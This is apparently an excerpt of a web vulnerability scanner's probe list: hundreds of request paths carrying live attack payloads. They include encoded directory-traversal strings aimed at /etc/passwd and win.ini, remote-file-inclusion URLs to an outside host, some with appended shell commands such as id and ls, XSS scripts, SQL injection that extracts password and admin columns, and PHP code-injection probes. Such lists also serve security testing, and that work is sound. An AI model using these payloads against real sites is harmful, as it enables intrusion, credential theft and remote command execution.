linximeng_files/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fboot.ini
linximeng_files/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd
linximeng_files/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini
linximeng_files/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd
linximeng_files/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cboot.ini
linximeng_files/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cetc/passwd
linximeng_files/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cwindows/win.ini
linximeng_files/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af/etc/passwd
linximeng_files/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af/windows/win.ini
linximeng_files/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c/etc/passwd
linximeng_files/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c/windows/win.ini
linximeng_files/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
linximeng_files/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini
linximeng_files/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/etc/passwd
linximeng_files/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
linximeng_files/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/etc/passwd
linximeng_files/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/etc/passwd
linximeng_files/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/windows/win.ini
linximeng_files/................etc/passwd
linximeng_files/................windows/win.ini
linximeng_files/..../..../..../..../..../..../..../..../..../..../..../..../..../..../..../..../..../....//etc/passwd
linximeng_files/.../.../.../.../.../.../.../.../etc/passwd
linximeng_files/.../.../.../.../.../.../.../.../windows/win.ini
linximeng_files/../Gemfile
linximeng_files/../WEB-INF/web.xml%C0%80.jsp
linximeng_files/../WEB-INF/web.xml?
linximeng_files/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd
linximeng_files/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini
linximeng_files/..\x5C\x5C\x5C..\x5C\x5C\x5C..\x5C\x5C\x5C..\x5C\x5C\x5C..\x5C\x5C\x5C..\x5C\x5C\x5C..\x5C\x5C\x5C..\x5C\x5C\x5C..\x5C\x5C\x5C..\x5C\x5C\x5C..\x5C\x5C\x5C..\x5C\x5C\x5C..\x5C\x5C\x5C..\x5C\x5C\x5C..\x5C\x5C\x5C..\x5C\x5C\x5C/etc/passwd
linximeng_files/./WEB-INF/web.xml%C0%80.jsp
linximeng_files/./WEB-INF/web.xml?
linximeng_files/.\x5C..\x5C.\x5C..\x5C.\x5C..\x5C.\x5C..\x5C.\x5C..\x5C.\x5C..\x5C.\x5C..\x5C.\x5C..\x5Cetc/passwd
linximeng_files/.\x5C..\x5C.\x5C..\x5C.\x5C..\x5C.\x5C..\x5C.\x5C..\x5C.\x5C..\x5C.\x5C..\x5C.\x5C..\x5Cwindows/win.ini
linximeng_files//%5c../%5c../%5c../%5c../%5c../%5c../%5c../etc/passwd
linximeng_files//....//....//....//....//....//....//....//....//etc//passwd
linximeng_files//978567%40
linximeng_files/;946398%40
linximeng_files/?962712%40
linximeng_files/\x22919024%40
linximeng_files/\x5C%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd
linximeng_files/\x5C%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini
linximeng_files/gc4qnbcmRk.jsp
linximeng_files/style.css
list
list.asp?agent=-1%20union%20select%20md5(111),0,0,0,0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20user%20where%20id%20like%201
list.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
listener.log
lms_path/modules/userpanel.php?CONFIG[directories][userpanel_dir]=http://www.yxlink.com/nvs_test.txt
lms_path/modules/welcome.php?_LIB_DIR=http://www.yxlink.com/nvs_test.txt
load_lang.php?_SERWEB[configdir]=http://www.yxlink.com/nvs_test.txt
load_lang.php?_SERWEB[serwebdir]=http://www.yxlink.com/nvs_test.txt
load_phplib.php?_PHPLIB[libdir]=http://www.yxlink.com/nvs_test.txt
loader-wizard.php?page=phpinfo
loader.php?GLOBALS=http://www.yxlink.com/nvs_test.txt
local/lib/lcUser.php?LIBDIR=http://www.yxlink.com/nvs_test.txt?
localhost.sql
localstart.asp
log
log.htm
log.html
log.jsp?log=%3Cimg%20src=%27%27%20onerror=%27javascript:alert(%22xss%22)%27%3E
log.mdb
log.php?bibtexrootrel=http://www.yxlink.com/nvs_test.txt?
log.sqlite
log.txt
logfile
logfiles
login
login.aspx?postusername=\x22><iframe src=\x22http://www.baidu.com\x22>
login.jsp
login.php3?cl_headers=http://www.yxlink.com/nvs_test.txt
login.php?Cmd=error&Code=-5&Lang=\x22></a></span><script>alert(\x2212345678\x22)</script>
login.php?action=quit&pre_url=http://www.baidu.com
login.php?base_dir=http://www.yxlink.com/nvs_test.txt
login.php?blog_theme=http://www.yxlink.com/nvs_test.txt
login.php?langfile=http://www.yxlink.com/nvs_test.txt
login.php?pachtofile=http://www.yxlink.com/nvs_test.txt
login.php?sess=your_session_id&abt=&new_lang=99999&caller=navlang
login.php?srcdir=http://www.yxlink.com/nvs_test.txt?
login.php?value=http://www.yxlink.com/nvs_test.txt??
login.pl?course_id=\x5C\x22>&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;
login.wcap?calid=&calname=&date=&fmt-out=<script>alert(document.cookie)</script>&view=&locale=&tzid=&test=1229606492214&user=test&password=test
login/
login/FilepathLogin.html?reason=<script>alert(0)</script>
login/Jeecms.do
login/eWebEditorNet/admin/login.aspx
login/eWebEditorNet/admin_login.aspx
login/editor/admin/login.aspx
login/editor/admin/login.php
login/editor/admin_login.asp
login/editor/admin_login.aspx
login/editor/admin_login.php
login/editor/login.asp
login/eweb/admin_login.asp
login/ewebeditor/admin/login.aspx
login/ewebeditor/admin/login.php
login/ewebeditor/admin_login.asp
login/ewebeditor/admin_login.aspx
login/ewebeditor/admin_login.php
login/ewebeditor/login.asp
login/sm_login_screen.php?error=\x5C\x22><script>alert('Vulnerable')</script>
login/sm_login_screen.php?uid=\x5C\x22><script>alert('Vulnerable')</script>
login/webeditor/admin_login.asp
loginreq2.php?subgroupname=\x22><script>alert(666)</script>
logins.html
logs
logs.htm
logs.html
logs.mdb
logs.sqlite
logs/
logviewer.jsp?clearLog=false&emailLog=false&lines=&log=%22/%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E%3C!--&markLog=false&mode=desc&refresh=&saveLog=false
lol.php
long_inexistent_path12345_/Null.htw?CiWebhitsfile=:&CiRestriction=b&CiHiliteType=full
lostpassword
lovecms/install/index.php?step=http://www.yxlink.com/nvs_test.txt?
lpt9
lpt9.xtp
ls
lxH2ZHWM9t.jsp
m
m.php
m2f/m2f_cron.php?m2f_root_path=http://www.yxlink.com/nvs_test.txt
m2f/m2f_forum.php?m2f_root_path=http://www.yxlink.com/nvs_test.txt
m2f/m2f_mailinglist.php?m2f_root_path=http://www.yxlink.com/nvs_test.txt
m2f/m2f_phpbb204.php?m2f_root_path=http://www.yxlink.com/nvs_test.txt
mXpilw3J
maguz.php?site=http://www.yxlink.com/nvs_test.txt
mail/addressaction.html?id=<USERID
mail/childwindow.inc.php?form=http://www.yxlink.com/nvs_test.txt
mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://www.yxlink.com/nvs_test.txt
mail/mmex.php?Setings=http://www.yxlink.com/nvs_test.txt
mail_this_entry/mail_autocheck.php?pm_path=http://www.yxlink.com/nvs_test.txt?&cmd=ls
mailer3.php
mailmain?intertype=ajax&type=getAllUserList_simple
mailman/admin/ml-name?\x5C\x22><script>alert('Vulnerable')</script>;
mailman/listinfo
mailman/listinfo/<script>alert('Vulnerable')</script>
mailman/options/yourlist?language=en&email=&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;
main
main.cgi?next_file=/etc/passwd
main.inc.php?pathtoscript=http://www.yxlink.com/nvs_test.txt
main.php?config[search_disp]=true&include_dir=http://www.yxlink.com/nvs_test.txt
main.php?id=http://www.yxlink.com/nvs_test.txt
main.php?include_path=http://www.yxlink.com/nvs_test.txt
main.php?pageURL=http://www.yxlink.com/nvs_test.txt
main.php?pagina=http://www.yxlink.com/nvs_test.txt
main/forum/komentar.php?site_path=http://www.yxlink.com/nvs_test.txt
main/main.php?pi=http://www.yxlink.com/nvs_test.txt
main/ppcbannerclick.php?INC=http://www.yxlink.com/nvs_test.txt?
main/ppcclick.php?INC=http://www.yxlink.com/nvs_test.txt?
main_page.php
main_prepend.php?_SERWEB[functionsdir]=http://www.yxlink.com/nvs_test.txt
mainpage.php?docroot=http://www.yxlink.com/nvs_test.txt?cmd
mambo/administrator/phpinfo.php
mambo/index.php?Itemid=JUNK(5)
mamboleto.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
mambots/editors/fckeditor
mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
mambots/editors/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=./index.php&fltr[]=blur|5;echo+082119f75623eb7abd7bf357698ff66c>cache/acunetix;
man2html
manage/
manage/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
manage/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
manage/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
manage/eWebEditorNet/admin/login.aspx
manage/eWebEditorNet/admin_login.aspx
manage/editor/admin/login.aspx
manage/editor/admin_login.asp
manage/editor/admin_login.aspx
manage/editor/admin_login.php
manage/editor/login.asp
manage/editor/login.php
manage/eweb/admin_login.asp
manage/ewebeditor/admin/login.php
manage/ewebeditor/admin_login.asp
manage/ewebeditor/admin_login.aspx
manage/ewebeditor/admin_login.php
manage/ewebeditor/login.asp
manage/ewebeditor/login.aspx
manage/fckeditor
manage/webeditor/admin_login.asp
manage123/
manage_songs.php?foing_root_path=http://www.yxlink.com/nvs_test.txt
management
manager
manager/
manager/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
manager/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
manager/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
manager/admin/index.php?MGR=http://www.yxlink.com/nvs_test.txt
manager/admin/p_ins.php?MGR=http://www.yxlink.com/nvs_test.txt
manager/admin/u_ins.php?MGR=http://www.yxlink.com/nvs_test.txt
manager/articles.php?_PX_config[manager_path]=http://www.yxlink.com/nvs_test.txt
manager/editor/admin/login.aspx
manager/editor/admin_login.asp
manager/editor/admin_login.aspx
manager/editor/admin_login.php
manager/editor/login.asp
manager/editor/login.php
manager/eweb/admin/login.asp
manager/eweb/admin/login.aspx
manager/eweb/admin/login.jsp
manager/eweb/admin/login.php
manager/eweb/admin_login.asp
manager/eweb/admin_login.aspx
manager/eweb/admin_login.jsp
manager/eweb/admin_login.php
manager/ewebeditor/admin/login.php
manager/ewebeditor/admin_login.asp
manager/ewebeditor/admin_login.aspx
manager/ewebeditor/admin_login.php
manager/ewebeditor/login.asp
manager/html
manager/html-manager-howto.html
manager/html/
manager/manager-howto.html
manager/phpThumb/phpThumb.php?src=./index.php&fltr[]=blur|5;echo+082119f75623eb7abd7bf357698ff66c>cache/acunetix;
manager/static/view.php?propID=0&INC=http://www.yxlink.com/nvs_test.txt
manager/status/all
manager/webeditor/admin_login.asp
manual
manual/servlets/scripts/servlet1/servform.htm
manual/servlets/scripts/shoes/shoeform.htm
manuals
map.php?lat=%3C/script%3E%3Cscript%3Ealert(111)%3C/script%3E
mapa.php?do=showdetails&mapid=-1+UNION+SELECT+0,1,md5(333),salt,username,5,6,7,8,9,10,11,12,13+FROM+user--
mapi/comm.php
master.php?root_path=http://www.yxlink.com/nvs_test.txt
master/set_1.aspx
mc-icons/
mcNews/admin/header.php?skinfile=http://www.yxlink.com/nvs_test.txt
mcf.php?content=http://www.yxlink.com/nvs_test.txt
mcnews/admin/install.php?l=http://www.yxlink.com/nvs_test.txt
media
media/amcolumn/amcolumn.swf?chart_settings=<settings></settings>&chart_data=<chart><message><![CDATA[<a+href=\x22javascript:alert(1)\x22>click</a>]]></message></chart>&.swf
media/flash/uploadify.swf?uploadifyID=00%22%29%29;}catch%28e%29{alert%281%29;}//%28%22&movieName=%22])}catch(e){if(!window.x){window.x=1;alert(2)}}//&.swf
media/flowplayer.swf?config=https://s3-us-west-2.amazonaws.com/bxss/fp.js
media/jwplayer/player.swf?playerready=alert(document.domain)&debug=function(){alert(document.domain)}
mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=http://www.yxlink.com/nvs_test.txt
megabook/admin.cgi?login=<script>alert('Vulnerable')</script>
member
member.php/>\x22><ScRiPt>alert(32323)</ScRiPt>
member.php?action='
member.php?action=login : username='
member.php?vwar_root=http://www.yxlink.com/nvs_test.txt
member.php?vwar_root=http://www.yxlink.com/nvs_test.txt&cmd=ls
member/ajax_membergroup.php?action=post&membergroup=@`\xE2\x80\x99`%20Union%20select%20md5(333333)%20from%20`%23@__admin`%20where%201%20or%20id=@`\xE2\x80\x99`
member/login.php?forward=\x22><script>alert(111)</script>
member/login.php?gourl=%22%3E%3Ciframe%20src=http://www.baidu.com%3E
member/member.php?username=luoye%cf union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,md5(333),password,57,58,59,60,61,62,63,64,65/**/from/**/phpcms_member/**/where/**/userid=1/
member/post.php?only=1&showHtml_Type[bencandy][1]={${phpinfo()}}&aid=1&job=endHTML
member/usercp_menu.php?script_folder=http://www.yxlink.com/nvs_test.txt
memberlist
memberlist.php?=>\x22'><ScRiPt>alert(333)</ScRiPt>
members
members.asp?SF=%22;}alert('Vulnerable');function%20x(){v%20=%22
members.csv
members.log
members.mdb
members.sql
members.sql.gz
members.sqlite
members.txt
members.xls
members/index.php?INC=http://www.yxlink.com/nvs_test.txt?
members/registration.php?INC=http://www.yxlink.com/nvs_test.txt?
members_help.php?hlp=http://www.yxlink.com/nvs_test.txt?
membersonly
membres/membreManager.php?include_path=http://www.yxlink.com/nvs_test.txt
membres/membreManager.php?include_path=http://www.yxlink.com/nvs_test.txt?
menu
menu.php3?cl_headers=http://www.yxlink.com/nvs_test.txt
menu.php?functions_file=http://www.yxlink.com/nvs_test.txt
menu_dx.php?SITE_Path=http://www.yxlink.com/nvs_test.txt
mep/frame.php?chem=http://www.yxlink.com/nvs_test.txt
mep/frame.php?chem=http://www.yxlink.com/nvs_test.txt?
message.php?act='and(select/**/1/**/from/**/(select/**/count(*),concat(md5(333),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)and'&city=fujian&id=4&
message.php?action=scout\x22><script>alert(111)</script>
message.php?action=scout\x22><script>alert(222);</script>
messageboard/Forum.asp?QuestionNumber=1&Find=1&Category=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E%3C%22
messages
microcms-include.php?microcms_path=http://www.yxlink.com/nvs_test.txt
microcms/includes/file_manager/special.php?fm_includes_special=http://www.yxlink.com/nvs_test.txt
middle.php?file=http://www.yxlink.com/nvs_test.txt
migrateNE2toNE3.php?_NE[AbsPath]=http://www.yxlink.com/nvs_test.txt
mima.php
mime
min/index.php?f=/min/config.php%00.css
mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=http://www.yxlink.com/nvs_test.txt?
mindmeld/include/ask.inc.php?MM_GLOBALS[home]=http://www.yxlink.com/nvs_test.txt?
mindmeld/include/learn.inc.php?MM_GLOBALS[home]=http://www.yxlink.com/nvs_test.txt?
mindmeld/include/manage.inc.php?MM_GLOBALS[home]=http://www.yxlink.com/nvs_test.txt?
mindmeld/include/mind.inc.php?MM_GLOBALS[home]=http://www.yxlink.com/nvs_test.txt?
mindmeld/include/sensory.inc.php?MM_GLOBALS[home]=http://www.yxlink.com/nvs_test.txt?
mini-pub.php/front-end/img.php?sFileName=http://www.yxlink.com/nvs_test.txt?
minify/min/index.php?f=/minify/min/config.php%00.css
minimal/wiki.php?page=http://www.yxlink.com/nvs_test.txt?
misc
misc.php/>\x22><ScRiPt>alert(333)</ScRiPt>
misc.php?do=page&template={${phpinfo()}}
misc.php?sub=memberlist&order=1& qorder=UNION+ALL+SELECT+uid,username,3,4,membercode,6,7,8,9,10,11,12,13,14,md5(333),16,17,18,19,20,21,22,23,24,25,26,27,28,29+ FROM+deluxebb_users%23&sort=ASC&filter=all&searchuser=.&submit=1
misc.php?sub=profile&name=0%27
misc/function.php3?path=http://www.yxlink.com/nvs_test.txt?
mitglieder.php?config[root_ordner]=http://www.yxlink.com/nvs_test.txt?&cmd=id
mkportal/include/user.php?MK_PATH=http://www.yxlink.com/nvs_test.txt
moadmin.php?action=listRows&collection=1&find=array%281%29;@print%20md5%28333%29;exit
mobile/user.php?act=order_list
mod/authent.php4?rootpath=http://www.yxlink.com/nvs_test.txt
mod/image/index.php?config[pathMod]=http://www.yxlink.com/nvs_test.txt
mod/liens/index.php?config[pathMod]=http://www.yxlink.com/nvs_test.txt
mod/liste/index.php?config[pathMod]=http://www.yxlink.com/nvs_test.txt
mod/nc_phpmyadmin/core/libraries/Theme_Manager.class.php?GLOBALS=http://www.yxlink.com/nvs_test.txt
mod/special/index.php?config[pathMod]=http://www.yxlink.com/nvs_test.txt
mod/texte/index.php?config[pathMod]=http://www.yxlink.com/nvs_test.txt
mod_membre/inscription.php?chemin=http://www.yxlink.com/nvs_test.txt?
mod_ose_docs
mod_phpalbum/sommaire_admin.php?chemin=http://www.yxlink.com/nvs_test.txt?
modcp.php?action=post_del&x='
modcp.php?action=post_del&x=6&y='
moderation.php?action=removesubscriptions&ajax=1&url='%2Balert('XSS!')//
modernbill/include/html/config.php?DIR=http://www.yxlink.com/nvs_test.txt
modifyform.html?code=http://www.yxlink.com/nvs_test.txt
modoer/space.php?suid=1%d5%27%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28md5(333),floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
mods/apage/apage.cgi?f=file.htm.|id|
mods/business_functions.php?GALLERY_BASEDIR=http://www.yxlink.com/nvs_test.txt
mods/config/load.inc.php?moddir=http://www.yxlink.com/nvs_test.txt?
mods/http/load.inc.php?moddir=http://www.yxlink.com/nvs_test.txt?
mods/ui_functions.php?GALLERY_BASEDIR=http://www.yxlink.com/nvs_test.txt
modsecurity.php?inc_prefix=http://www.yxlink.com/nvs_test.txt
module/account/register/register.asp?Address1=%22%3E%3Cscript%3Ealert(333)%3C/script%3E
module/account/register/register.asp?Address2=%22%3E%3Cscript%3Ealert(333)%3C/script%3E
module/account/register/register.asp?City=%22%3E%3Cscript%3Ealert(333)%3C/script%3E
module/account/register/register.asp?Email=%22%3E%3Cscript%3Ealert(333)%3C/script%3E
module/account/register/register.asp?FirstName=%22%3E%3Cscript%3Ealert(3333)%3C/script%3E
module/account/register/register.asp?LastName=%22%3E%3Cscript%3Ealert(333)%3C/script%3E
module/account/register/register.asp?Password=%22%3E%3Cscript%3Ealert(333)%3C/script%3E
module/account/register/register.asp?Username=%22%3E%3Cscript%3Ealert(333)%3C/script%3E
module/account/register/register.asp?ZipCode=%22%3E%3Cscript%3Ealert(333)%3C/script%3E
module/article/article/article.asp?articleid='
module/download/downfile.jsp?filename=downfile.jsp&pathfile=module/download/downfile.jsp
module/forum/forum.php?fd=http://www.yxlink.com/nvs_test.txt=';
module/forum/main.php?id=1&main_dir=http://www.yxlink.com/nvs_test.txt?&
module/tiny_mce
module/tinymce
modules
modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index
modules.php?modules.php?name=KutubiSitte&h_op=hadisgoster&kid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0,aid,md5(333),4%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A
modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=<script>alert('Vulnerable')</script>
modules.php?name=Downloads&d_op=viewdownload
modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert('Vulnerable')</script>
modules.php?name=Members_List&letter='%20OR%20pass%20LIKE%20'a%25'/*
modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,md5(333),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*
modules.php?name=Reviews&rop=postcomment&id='&title=<h1>22222</h1>
modules.php?name=Search&type=comments&query=not123exists&instory=/**/UNION/**/SELECT/**/0,0,md5(333),0,aid/**/FROM/**/nuke_authors
modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=<script>alert('Vulnerable')</script>
modules.php?name=Stories_Archive&sa=show_month&year=<script>alert('Vulnerable')</script>&month=3&month_l=test
modules.php?name=Surveys&pollID=<script>alert('Vulnerable')</script>
modules.php?name=Surveys&pollID=a'
modules.php?name=Your_Account&op=userinfo&uname=<script>alert('Vulnerable')</script>
modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script>
modules.php?name=http://www.yxlink.com/nvs_test.txt&file=article&sid=2
modules.php?name=modload&name=4nChat&file=index&roomid=-2+union+select+1,md5(333),3,4,5+from+nuke_authors
modules.php?op=modload&name=0&file=0
modules.php?op=modload&name=DMOZGateway&file=index&topic=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(document.cookie);%3E&parent_id=0
modules.php?op=modload&name=Guestbook&file=index&entry=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=Members_List&file=index&letter=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=Members_List&file=index&letter=All&sortby='
modules.php?op=modload&name=News&file=article&sid=1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(md5(333),0x3a,pn_pass),16,17,18,19,20,21+from+nuke_users--
modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>
modules.php?op=modload&name=News&file=index&catid=&topic=><script>alert('Vulnerable');</script>;
modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid=
modules.php?op=modload&name=WebChat&file=index&roomid=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=Wiki&file=index&pagename=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=Xforum&file=<script>alert('Vulnerable')</script>&fid=2
modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script|
modules/4nAlbum/public/displayCategory.php?basepath=http://www.yxlink.com/nvs_test.txt
modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.yxlink.com/nvs_test.txt
modules/Calendar/admin/update.php?calpath=http://www.yxlink.com/nvs_test.txt?
modules/Calendar/calendar.php?calpath=http://www.yxlink.com/nvs_test.txt?
modules/Calendar/scheme.php?calpath=http://www.yxlink.com/nvs_test.txt?
modules/Discipline/CategoryBreakdownTime.php?FocusPath=http://www.yxlink.com/nvs_test.txt
modules/Discipline/CategoryBreakdownTime.php?staticpath=http://www.yxlink.com/nvs_test.txt
modules/Discipline/StudentFieldBreakdown.php?staticpath=http://www.yxlink.com/nvs_test.txt
modules/Downloads/voteinclude.php
modules/Forums/admin/admin_avatar.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
modules/Forums/admin/admin_board.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
modules/Forums/admin/admin_disallow.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
modules/Forums/admin/admin_forumauth.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
modules/Forums/admin/admin_groups.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
modules/Forums/admin/admin_mass_email.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
modules/Forums/admin/admin_ranks.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
modules/Forums/admin/admin_user_ban.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
modules/Forums/admin/admin_users.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
modules/Forums/admin/admin_words.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
modules/Forums/admin/index.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
modules/Forums/bb_smilies.php?Default_Theme=<script>alert('Vulnerable')</script>
modules/Forums/bb_smilies.php?bgcolor1=\x5C\x22><script>alert('Vulnerable')</script>
modules/Forums/bb_smilies.php?name=<script>alert('Vulnerable')</script>
modules/Forums/bb_smilies.php?site_font=}--></style><script>alert('Vulnerable')</script>
modules/MusooTemplateLite.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.yxlink.com/nvs_test.txt
modules/My_eGallery/index.php?basepath=http://www.yxlink.com/nvs_test.txt
modules/My_eGallery/public/displayCategory.php?basepath=http://www.yxlink.com/nvs_test.txt
modules/Mysqlfinder/MysqlfinderAdmin.php?_SESSION[PATH_COMPOSANT]=http://www.yxlink.com/nvs_test.txt?
modules/NukeAI/util.php?AIbasedir=http://www.yxlink.com/nvs_test.txt
modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
modules/Sgallery/imageview.php?idimage=-99/**/UNION/**/SELECT/**/md5(333)/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1
modules/SoundImporter.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.yxlink.com/nvs_test.txt
modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</script>
modules/Xanthia/pnhtml/demo.php?skin=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
modules/abook/foldertree.php?baseDir==http://www.yxlink.com/nvs_test.txt?
modules/addons/plugin.php?doc_root=http://www.yxlink.com/nvs_test.txt
modules/admin/include/config.php?doc_root=http://www.yxlink.com/nvs_test.txt
modules/admin/include/localize.php?doc_root=http://www.yxlink.com/nvs_test.txt
modules/admin/vw_usr_roles.php?baseDir=http://www.yxlink.com/nvs_test.txt
modules/agendax/addevent.inc.php?agendax_path=http://www.yxlink.com/nvs_test.txt&cmd=id
modules/bank/includes/design/main.inc.php?bank_data[root]=http://www.yxlink.com/nvs_test.txt
modules/basicfog/basicfogfactory.class.php?PATH_TO_CODE=http://www.yxlink.com/nvs_test.txt
modules/birstday/birst.php?exbb[home_path]=http://www.yxlink.com/nvs_test.txt?
modules/birstday/profile_show.php?exbb[home_path]=http://www.yxlink.com/nvs_test.txt?
modules/birstday/select.php?exbb[home_path]=http://www.yxlink.com/nvs_test.txt?
modules/blocks/headerfile.php?system[path]=http://www.yxlink.com/nvs_test.txt
modules/calendar/index.php?inc_dir=http://www.yxlink.com/nvs_test.txt
modules/calendar/minicalendar.php?GLOBALS[rootdp]=./&GLOBALS[gsLanguage]=http://www.yxlink.com/nvs_test.txt?
